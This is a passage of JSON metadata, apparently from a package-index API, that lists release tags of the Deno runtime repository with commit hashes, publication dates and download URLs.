s/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"h